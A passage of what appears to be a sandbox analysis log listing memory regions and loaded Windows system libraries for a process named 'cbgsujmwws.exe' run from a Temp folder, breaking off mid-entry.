monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 452 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 453 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "cbgsujmwws.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe") Region: id = 454 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 455 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 456 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 457 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 458 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 459 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 462 start_va = 0x400000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 477 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 478 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 479 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 480 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 481 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 482 start_va = 0x4b0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 483 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 484 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 485 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 486 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 487 start_va = 0x4b0000 end_va = 0x56dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 488 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 489 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 490 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 491 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 492 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 493 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 494 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 495 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 496 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 497 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 498 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 499 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 500 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 501 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 502 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 503 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 504 start_va = 0x8a0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 505 start_va = 0x5b0000 end_va = 0x5d9fff monitored = 0 entry_point = 0x5b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 506 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 507 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 508 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 509 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 510 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 511 start_va = 0xd20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 512 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 513 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 514 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 515 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 516 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 517 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 518 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 519 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 520 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 521 start_va = 0x70410000 end_va = 0x70422fff monitored = 0 entry_point = 0x70419950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 522 start_va = 0x703e0000 end_va = 0x7040efff monitored = 0 entry_point = 0x703f95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 523 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 524 start_va = 0x2120000 end_va = 0x2456fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 525 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 526 start_va = 0x6cf40000 end_va = 0x6cf79fff monitored = 0 entry_point = 0x6cf59be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 527 start_va = 0x74130000 end_va = 0x741f7fff monitored = 0 entry_point = 0x7419ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 528 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 529 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 530 start_va = 0x70430000 end_va = 0x70437fff monitored = 0 entry_point = 0x70431d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 531 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 532 start_va = 0x5c0000 end_va = 0x663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 533 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 534 start_va = 0x6dc10000 end_va = 0x6dc24fff monitored = 0 entry_point = 0x6dc15210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 535 start_va = 0x6d1a0000 end_va = 0x6d1b2fff monitored = 0 entry_point = 0x6d1a5c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 536 start_va = 0x705f0000 end_va = 0x70608fff monitored = 0 entry_point = 0x705f47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 537 start_va = 0x72040000 end_va = 0x7208efff monitored = 0 entry_point = 0x7204d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 538 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 539 start_va = 0x5b0000 end_va = 0x5b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 540 start_va = 0x71fb0000 end_va = 0x72033fff monitored = 0 entry_point = 0x71fd6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 541 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 542 start_va = 0x71f70000 end_va = 0x71f77fff monitored = 0 entry_point = 0x71f71920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 543 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 544 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 545 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 546 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 547 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 548 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 549 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 550 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 551 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 552 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 553 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 554 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 555 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 556 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 557 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 558 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 559 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 560 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 561 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 562 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 563 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 564 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 565 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 566 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 567 start_va = 0x2460000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 568 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 569 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 570 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 571 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 572 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 573 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 574 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 575 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 576 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 577 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 578 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 579 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 580 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 581 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 582 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 583 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 584 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 585 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 586 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 587 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 588 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 589 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 590 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 591 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 592 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 593 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 594 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 595 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 596 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 597 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 598 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 599 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 600 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 601 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 602 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 603 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 604 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 605 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 606 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 607 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 608 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 609 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 610 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 611 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 612 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 613 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 614 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 615 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 616 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 617 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 618 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 619 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 620 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 621 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 622 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 623 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 624 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 625 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 626 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 627 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 628 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 629 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 630 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 631 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 632 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 633 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 634 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 635 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 636 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = 